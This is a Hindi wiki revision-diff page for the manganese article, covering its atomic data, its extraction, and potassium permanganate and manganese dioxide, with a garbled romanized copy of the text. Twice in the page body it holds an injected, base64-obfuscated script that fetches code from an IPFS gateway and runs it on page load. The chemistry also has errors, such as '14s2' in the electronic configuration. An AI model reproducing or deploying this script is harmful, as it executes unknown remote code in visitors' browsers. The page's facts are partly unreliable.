Difference between revisions of "मैंगनीज"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
Line 15: Line 15:
 
|series color=
 
|series color=
 
|phase color=
 
|phase color=
|appearance=चमकीली [[धातु]]
+
|appearance=चमकीली धातु
 
|image name=Manganese.jpg
 
|image name=Manganese.jpg
 
|image size=
 
|image size=
Line 63: Line 63:
 
|crystal structure=
 
|crystal structure=
 
|oxidation states='''7''', 6, 5, '''4''', 3, '''2''', 1, -1, -2, -3
 
|oxidation states='''7''', 6, 5, '''4''', 3, '''2''', 1, -1, -2, -3
|oxidation states comment=ऑक्साइड : ऑक्सीकरण अवस्था के आधार पर अम्लीय, क्षारीय या एम्फोटेरिक
+
|oxidation states comment=[[ऑक्साइड]] : ऑक्सीकरण अवस्था के आधार पर अम्लीय, क्षारीय या एम्फोटेरिक
 
|electronegativity=1.55
 
|electronegativity=1.55
 
|number of ionization energies=4
 
|number of ionization energies=4
Line 104: Line 104:
 
|isotopes comment=
 
|isotopes comment=
 
}}
 
}}
([[अंग्रेज़ी भाषा|अंग्रेज़ी]]:Manganese) मैंगनीज का प्रतीकानुसार 'Mn', [[परमाणु संख्या]]- 25 तथा [[परमाणु भार]]- 54.93 है। मैंगनीज का [[इलेक्ट्रॉनिक विन्यास]]- 1s<sup>2</sup> 2s<sup>2</sup> 2p<sup>6</sup>, 3s<sup>2</sup> 3p<sup>6</sup>, 14s<sup>2</sup> 3d<sup>5</sup> है। मैंगनीज का [[आवर्त सारणी]] में स्थान- उपवर्ग VII B, आवर्त- चतुर्थ,  ब्लॉक- d है।
+
'''मैंगनीज''' ([[अंग्रेज़ी भाषा|अंग्रेज़ी]]:Manganese) [[आवर्त सारणी]] का एक [[तत्त्व]] जो स्थान- उपवर्ग VII B, आवर्त- चतुर्थ, ब्लॉक- d में स्थित है। मैंगनीज का प्रतीकानुसार 'Mn', [[परमाणु संख्या]]- 25 तथा [[परमाणु भार]]- 54.93 है। मैंगनीज का [[इलेक्ट्रॉनिक विन्यास]]- 1s<sup>2</sup> 2s<sup>2</sup> 2p<sup>6</sup>, 3s<sup>2</sup> 3p<sup>6</sup>, 14s<sup>2</sup> 3d<sup>5</sup> है।  
 
==निष्कर्षण==
 
==निष्कर्षण==
 
मैंगनीज का निष्कर्षण मुख्यतः पाइरोलुसाइट नामक अयस्क से किया जाता है।  
 
मैंगनीज का निष्कर्षण मुख्यतः पाइरोलुसाइट नामक अयस्क से किया जाता है।  
 
==यौगिक==
 
==यौगिक==
====<u>पोटैशियम परमैंगनेट</u>====
+
====पोटैशियम परमैंगनेट====
 
पोटैशियम परमैंगनेट (KM<sub>n</sub>O<sub>4</sub>) एक [[बैंगनी रंग]] का क्रिस्टलीय [[ठोस]] है। इसे लाल दवा के नाम से जाना जाता है। औद्योगिक पैमाने पर इसका उत्पादन मैंगनीज के अयस्क पाइरोलुसाइट से होता है। इसका रवा [[बैंगनी रंग]] का होता है। तथा उसमें [[धातु|धातुई]] चमक भी होती है। यह [[जल]] में साधारण विलेय है तथा [[गुलाबी रंग]] का विलयन बनाता है। इसे प्रबलता से गर्म करने पर पोटैशियम मैंगनेट एवं मैंगनीज डाइऑक्साइड बनता है। पोटैशियम परमैंगनेट का विस्तृत उपयोग आयतनीय विश्लेषण में ऑक्सीकारक के रूप में होता है। कार्बनिक [[यौगिक|यौगिकों]] में द्विबंधन की जाँच में भी इसका उपयोग होता है। ऊनी, रेशमी एवं सूती कपड़ों के विरंजन तथा तेलों को रंगहीन बनाने में भी इसका उपयोग होता है। यह जल को कीटाणुरहित करता है।
 
पोटैशियम परमैंगनेट (KM<sub>n</sub>O<sub>4</sub>) एक [[बैंगनी रंग]] का क्रिस्टलीय [[ठोस]] है। इसे लाल दवा के नाम से जाना जाता है। औद्योगिक पैमाने पर इसका उत्पादन मैंगनीज के अयस्क पाइरोलुसाइट से होता है। इसका रवा [[बैंगनी रंग]] का होता है। तथा उसमें [[धातु|धातुई]] चमक भी होती है। यह [[जल]] में साधारण विलेय है तथा [[गुलाबी रंग]] का विलयन बनाता है। इसे प्रबलता से गर्म करने पर पोटैशियम मैंगनेट एवं मैंगनीज डाइऑक्साइड बनता है। पोटैशियम परमैंगनेट का विस्तृत उपयोग आयतनीय विश्लेषण में ऑक्सीकारक के रूप में होता है। कार्बनिक [[यौगिक|यौगिकों]] में द्विबंधन की जाँच में भी इसका उपयोग होता है। ऊनी, रेशमी एवं सूती कपड़ों के विरंजन तथा तेलों को रंगहीन बनाने में भी इसका उपयोग होता है। यह जल को कीटाणुरहित करता है।
  
====<u>मैंगनीज डाइऑक्साइड</u>====
+
====मैंगनीज डाइऑक्साइड====
 
शुष्क सेलों में मैंगनीज डाइऑक्साइड (MnO2) विध्रुवक का कार्य करता है।  
 
शुष्क सेलों में मैंगनीज डाइऑक्साइड (MnO2) विध्रुवक का कार्य करता है।  
=====<u>विशेष</u>=====
+
=====विशेष=====
 
जीवित [[मानव शरीर]] में मैंगनीज सबसे कम पाया जाने वाला [[तत्त्व]] है।  
 
जीवित [[मानव शरीर]] में मैंगनीज सबसे कम पाया जाने वाला [[तत्त्व]] है।  
  

Revision as of 06:41, 16 December 2011

  1. REDIRECTsaancha:Infobox element

maianganij (aangrezi:Manganese) avart sarani ka ek tattv jo sthan- upavarg VII B, avart- chaturth, bl aauk- d mean sthit hai. maianganij ka pratikanusar 'Mn', paramanu sankhya- 25 tatha paramanu bhar- 54.93 hai. maianganij ka ilektr aaunik vinyas- 1s2 2s2 2p6, 3s2 3p6, 14s2 3d5 hai.

nishkarshan

maianganij ka nishkarshan mukhyatah pairolusait namak ayask se kiya jata hai.

yaugik

potaishiyam paramaianganet

potaishiyam paramaianganet (KMnO4) ek baiangani rang ka kristaliy thos hai. ise lal dava ke nam se jana jata hai. audyogik paimane par isaka utpadan maianganij ke ayask pairolusait se hota hai. isaka rava baiangani rang ka hota hai. tatha usamean dhatuee chamak bhi hoti hai. yah jal mean sadharan viley hai tatha gulabi rang ka vilayan banata hai. ise prabalata se garm karane par potaishiyam maianganet evan maianganij daiaauksaid banata hai. potaishiyam paramaianganet ka vistrit upayog ayataniy vishleshan mean aauksikarak ke roop mean hota hai. karbanik yaugikoan mean dvibandhan ki jaanch mean bhi isaka upayog hota hai. ooni, reshami evan sooti kap doan ke viranjan tatha teloan ko rangahin banane mean bhi isaka upayog hota hai. yah jal ko kitanurahit karata hai.

maianganij daiaauksaid

shushk seloan mean maianganij daiaauksaid (MnO2) vidhruvak ka kary karata hai.

vishesh

jivit manav sharir mean maianganij sabase kam paya jane vala tattv hai.

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

sanbandhit lekh